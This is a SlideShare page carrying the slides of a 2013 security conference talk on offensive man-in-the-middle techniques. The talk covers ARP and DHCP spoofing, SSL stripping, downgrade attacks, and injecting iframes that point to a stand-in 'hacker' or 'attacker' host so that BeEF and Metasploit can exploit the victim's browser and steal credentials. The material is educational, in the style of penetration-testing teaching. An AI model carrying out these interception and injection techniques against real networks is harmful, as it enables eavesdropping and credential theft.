Offensive Man-in-the-Middle
Navaja Negra - Albacete
Octubre 2013
$ whois jselvi
Jose Selvi
10 years working in Security
Senior Penetration Tester at
SANS Institute Community Instructor
GI...
Disclaimer!
No user was
(very) harmed
in the making
of this speach
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Man-in-the-Middle
Man-in-the-Middle
ARP Spoofing

WHO’S THE ROUTER?

I’M THE ROUTER!
DHCP Spoofing

I WANT AN IP

YOUR IP IS...
ICMP Redirect

A NEW ROUTE
FOR YOU
Much more...
DNS Spoofing
Port Stealing
STP Mangling
Route Mangling
...

Even Social Engineering...
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Just Sniffing...
Automated Analysis
Password Capture
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Protocol Negotiation
|@#|@#|@#|@#|#@
|@#|@#|@#|@#

|@#|@#|#|#@|@#|@#|@#
Downgrade Attack

Y dice “a relaxing
cup of cafe con
leche” la tia...

Calla, calla... que yo les
he dejado dinero...
The SSHv1 Example
I can speak
just v1

I can speak
v1 & v2
Client

Attacker

SSHv1

OK, Let’s
talk SSHv1

Server
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Self-Signed Certificate

Client

HTTPS

Attacker

Server

HTTPS
SSL Strip
http://www.thoughtcrime.org/software/sslstrip/
By Moxie Marlinspike

Transparent proxy
HTTP to HTTPS Gateway
sed...
SSL Strip
GET / HTTP/1.1
HTTP
Client

Attacker
Server

HTTPS
<body>
<img src=whatever.jpg>
<a href = https://myweb/login>
...
DEMO
SSL Vulnerabilities
BEAST / CRIME
By Juliano Rizzo, Thai Duong
BREACH
By Angel Prado, Neal Harris, Yoel Gluck
Based on com...
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Spanish model
Corp.
B

Corp.
C
Corp.
A

Corp.
D
The “K” Factor
<body>
<img src=whatever.jpg>
<iframe src=http://hacker/>
</body>
The Middler
https://code.google.com/p/middler/
By InGuardians
Transparent HTTP & SIP Proxy
Plugin based: Easy & Powerful
I...
The Middler Plugins
Burp Suite / The Middler
GET / HTTP/1.1
HTTP

Attacker

Client

Server

HTTP
<body>
<img src=whatever.jpg>
<iframe src=htt...
Burp Suite
http://portswigger.net/burp/
By PortSwigger
General interception proxy
Support transparent proxy
Support match/...
Burp Suite
DEMO
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
BeEF & Metasploit
BeEF: Browser Exploitation Framework
http://beefproject.com/

Metasploit Framework
http://www.metasploit...
BeEF & MSF
BeEF
MSF

GOOGLE

<iframe src=
http://attacker/demo
VICTIM
What to do
Fingerprinting
Redirect to another page
Capture NTLM
SMB Relay Attacks
Credential Theft
Request software instal...
DEMO
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Browser Vulnerabilities 2012
Internet Explorer: 34
Mozilla Firefox: 99
Google Chrome: 68
Java Plugin: 32
Adobe Flash: 61
A...
Metasploit Exploitation
MSF

GOOGLE

<iframe src=
http://attacker/demo
VICTIM
DEMO
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up ...
Thanks! Questions?
Jose Selvi
http://twitter.com/JoseSelvi
jselvi@s21sec.com
http://www.s21sec.com

jselvi@pentester.es
ht...
Upcoming SlideShare
Loading in …5
×

Offensive MitM

1,919 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,919
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
69
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Offensive MitM

  1. 1. Offensive Man-in-the-Middle Navaja Negra - Albacete Octubre 2013
  2. 2. $ whois jselvi Jose Selvi 10 years working in Security Senior Penetration Tester at SANS Institute Community Instructor GIAC Security Expert (GSE) Twitter: @JoseSelvi Blog: http://www.pentester.es
  3. 3. Disclaimer! No user was (very) harmed in the making of this speach
  4. 4. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  5. 5. Man-in-the-Middle
  6. 6. Man-in-the-Middle
  7. 7. ARP Spoofing WHO’S THE ROUTER? I’M THE ROUTER!
  8. 8. DHCP Spoofing I WANT AN IP YOUR IP IS...
  9. 9. ICMP Redirect A NEW ROUTE FOR YOU
  10. 10. Much more... DNS Spoofing Port Stealing STP Mangling Route Mangling ... Even Social Engineering...
  11. 11. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  12. 12. Just Sniffing...
  13. 13. Automated Analysis
  14. 14. Password Capture
  15. 15. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  16. 16. Protocol Negotiation |@#|@#|@#|@#|#@ |@#|@#|@#|@# |@#|@#|#|#@|@#|@#|@#
  17. 17. Downgrade Attack Y dice “a relaxing cup of cafe con leche” la tia... Calla, calla... que yo les he dejado dinero...
  18. 18. The SSHv1 Example I can speak just v1 I can speak v1 & v2 Client Attacker SSHv1 OK, Let’s talk SSHv1 Server
  19. 19. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  20. 20. Self-Signed Certificate Client HTTPS Attacker Server HTTPS
  21. 21. SSL Strip http://www.thoughtcrime.org/software/sslstrip/ By Moxie Marlinspike Transparent proxy HTTP to HTTPS Gateway sed ‘s/https/http/g’ Usually all starts with an HTTP connection
  22. 22. SSL Strip GET / HTTP/1.1 HTTP Client Attacker Server HTTPS <body> <img src=whatever.jpg> <a href = https://myweb/login> http://myweb/login> </body>
  23. 23. DEMO
  24. 24. SSL Vulnerabilities BEAST / CRIME By Juliano Rizzo, Thai Duong BREACH By Angel Prado, Neal Harris, Yoel Gluck Based on compression characteristics before encryption. Chosen plaintext attack It can decrypt secrets (cookie, csrf-token, etc).
  25. 25. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  26. 26. Spanish model Corp. B Corp. C Corp. A Corp. D
  27. 27. The “K” Factor <body> <img src=whatever.jpg> <iframe src=http://hacker/> </body>
  28. 28. The Middler https://code.google.com/p/middler/ By InGuardians Transparent HTTP & SIP Proxy Plugin based: Easy & Powerful IFrame Injection Last release from July 2009 Some fixes are needed... but... that is why Python r00l3z :)
  29. 29. The Middler Plugins
  30. 30. Burp Suite / The Middler GET / HTTP/1.1 HTTP Attacker Client Server HTTP <body> <img src=whatever.jpg> <iframe src=http://hacker/> </body>
  31. 31. Burp Suite http://portswigger.net/burp/ By PortSwigger General interception proxy Support transparent proxy Support match/replace function Best option if you have the Pro version If not... you will lose your configuration when closing
  32. 32. Burp Suite
  33. 33. DEMO
  34. 34. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  35. 35. BeEF & Metasploit BeEF: Browser Exploitation Framework http://beefproject.com/ Metasploit Framework http://www.metasploit.com/
  36. 36. BeEF & MSF BeEF MSF GOOGLE <iframe src= http://attacker/demo VICTIM
  37. 37. What to do Fingerprinting Redirect to another page Capture NTLM SMB Relay Attacks Credential Theft Request software installation
  38. 38. DEMO
  39. 39. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  40. 40. Browser Vulnerabilities 2012 Internet Explorer: 34 Mozilla Firefox: 99 Google Chrome: 68 Java Plugin: 32 Adobe Flash: 61 Adobe Reader: 25 http://www.gfi.com/blog/wp-content/ uploads/2013/02/Most-TargetedApplications-in-2012.jpg
  41. 41. Metasploit Exploitation MSF GOOGLE <iframe src= http://attacker/demo VICTIM
  42. 42. DEMO
  43. 43. Let’s Go! Man-in-the-Middle 101 The Passive approach Downgrade Attacks SSL Bypass On-the-fly content injection Cheating up users Browser exploitation
  44. 44. Thanks! Questions? Jose Selvi http://twitter.com/JoseSelvi jselvi@s21sec.com http://www.s21sec.com jselvi@pentester.es http://www.pentester.es

×